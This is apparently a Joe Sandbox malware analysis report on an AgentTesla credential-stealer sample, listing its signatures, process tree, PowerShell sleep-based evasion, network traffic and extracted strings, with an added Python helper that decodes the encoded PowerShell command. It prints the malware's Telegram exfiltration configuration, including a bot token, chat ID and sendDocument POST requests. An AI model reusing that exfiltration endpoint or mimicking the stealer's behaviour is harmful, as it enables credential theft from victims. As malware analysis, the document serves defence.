
Windows Analysis Report
izwFjkhFJm.exe

Overview

General Information

Sample Name: izwFjkhFJm.exe
Original Sample Name: ae2a3b41292c66a9dd6f10c874c05293.exe
Analysis ID: 830846
MD5: ae2a3b41292c66a9dd6f10c874c05293
SHA1: caa30701c5487c2aecfb9b35b1d0e9ea6f3214b6
SHA256: 65cc1ea27c733c270dd0497ed9c99896baf50eeafa5e1200889557985bfd87d5
Tags: AgentTesla, exe, Telegram

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • izwFjkhFJm.exe (PID: 324 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • powershell.exe (PID: 6076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • izwFjkhFJm.exe (PID: 1784 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • izwFjkhFJm.exe (PID: 2108 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • izwFjkhFJm.exe (PID: 2312 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • izwFjkhFJm.exe (PID: 2948 cmdline: C:\Users\user\Desktop\izwFjkhFJm.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
  • Oefdyik.exe (PID: 5104 cmdline: "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe" MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • powershell.exe (PID: 5292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Oefdyik.exe (PID: 5344 cmdline: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • Oefdyik.exe (PID: 6036 cmdline: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe MD5: AE2A3B41292C66A9DD6F10C874C05293)
  • kDPmkTm.exe (PID: 1952 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • powershell.exe (PID: 4852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Oefdyik.exe (PID: 4700 cmdline: "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe" MD5: AE2A3B41292C66A9DD6F10C874C05293)
    • powershell.exe (PID: 5444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • kDPmkTm.exe (PID: 6084 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: AE2A3B41292C66A9DD6F10C874C05293)
  • cleanup
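Added example (Python, not part of the Joe Sandbox report): every powershell.exe child in the tree above carries the same `-ENC` argument, which the signature list only records as "Encrypted powershell cmdline option found". The helper below decodes an `-EncodedCommand` payload (base64 of UTF-16LE text; powershell.exe also accepts abbreviated flag forms such as `-e` and `-enc`, so the flag is matched as a prefix). The command lines are copied from the tree as constructed input; the `SLEEP_ONLY` heuristic and the function names are my own, not something the report provides.

```python
import base64
import re

# Constructed input: a PowerShell and a conhost command line from the process tree
# above (each powershell.exe instance in the tree carries this same payload).
SAMPLE_CMDLINES = [
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -ENC '
    'cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==',
    'C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1',
]

# A payload that does nothing but sleep: my own triage heuristic (not from the report)
# for the "delay and exit" pattern; anything else decoded from -enc deserves manual review.
SLEEP_ONLY = re.compile(r"^\s*start-sleep\s+-s(?:econds)?\s+\d+\s*$", re.IGNORECASE)


def encoded_command_argument(cmdline):
    """Return the base64 string that follows an -EncodedCommand style flag, or None.

    powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
    case-insensitively, so the flag is matched as a prefix rather than literally.
    """
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if not flag.startswith("-"):
            continue
        name = flag[1:].lower()
        if name and "encodedcommand".startswith(name):
            return value
    return None


def decode_encoded_command(cmdline):
    """Decode the -EncodedCommand payload to text; None if absent or not valid base64/UTF-16LE."""
    b64 = encoded_command_argument(cmdline)
    if b64 is None:
        return None
    try:
        raw = base64.b64decode(b64, validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage(cmdlines):
    """Return (image, decoded payload, verdict) for every line that carries an encoded command."""
    findings = []
    for line in cmdlines:
        decoded = decode_encoded_command(line)
        if decoded is None:
            continue
        verdict = "delay-only" if SLEEP_ONLY.match(decoded) else "review"
        findings.append((line.split()[0].strip('"'), decoded, verdict))
    return findings


if __name__ == "__main__":
    for image, decoded, verdict in triage(SAMPLE_CMDLINES):
        print(f"{image}\n  decoded : {decoded!r}\n  verdict : {verdict}")
```

The payload decodes to `start-sleep -seconds 20`: the child PowerShell only delays for 20 seconds, consistent with the sleep-based evasion signatures in the list above, and the encoded command itself carries no second-stage logic. For detection, decode the argument before matching on it; a rule written against the plaintext `start-sleep` would never see this form.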
{"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
Source | Rule | Description | Author | Strings
0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | -
Process Memory Space: izwFjkhFJm.exe PID: 2948 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
(4 further entries not shown)
Source | Rule | Description | Author | Strings
0.2.izwFjkhFJm.exe.5440000.4.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | -

No Sigma rule has matched
Timestamp: 03/20/23-18:33:24.869717
Source: 192.168.2.3:49715
Destination: 149.154.167.220:443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/20/23-18:31:36.462231
Source: 192.168.2.3:49701
Destination: 149.154.167.220:443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected

              AV Detection

Source: izwFjkhFJm.exe | ReversingLabs: Detection: 33%
Source: izwFjkhFJm.exe | Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Virustotal: Detection: 52%
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | ReversingLabs: Detection: 33%
Source: izwFjkhFJm.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Joe Sandbox ML: detected
Source: 0.2.izwFjkhFJm.exe.38b9d00.2.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
Source: Oefdyik.exe.6036.27.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
Source: izwFjkhFJm.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: izwFjkhFJm.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000463A000.00000004.00000800.00020000.00000000.sdmp

              Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49701 -> 149.154.167.220:443
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49715 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: unknown | DNS query: name: api.telegram.org
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\izwFjkhFJm.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: unknown | DNS query: name: api.ipify.org
Source: Yara match | File source: 0.2.izwFjkhFJm.exe.5440000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8db29c7c3cbde5f | Host: api.telegram.org | Content-Length: 972 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8db297197376642 | Host: api.telegram.org | Content-Length: 972 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 173.231.16.76 173.231.16.76
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/
Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.525853028.0000000003573000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.524877203.0000000003393000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCert
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.c
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: izwFjkhFJm.exe, 0000000F.00000003.344564244.0000000001519000.00000004.00000020.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.519934856.00000000011B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/
Source: izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.525853028.0000000003573000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.524877203.0000000003393000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCert
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046DD000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.00000000049DB000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000012.00000002.540877039.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
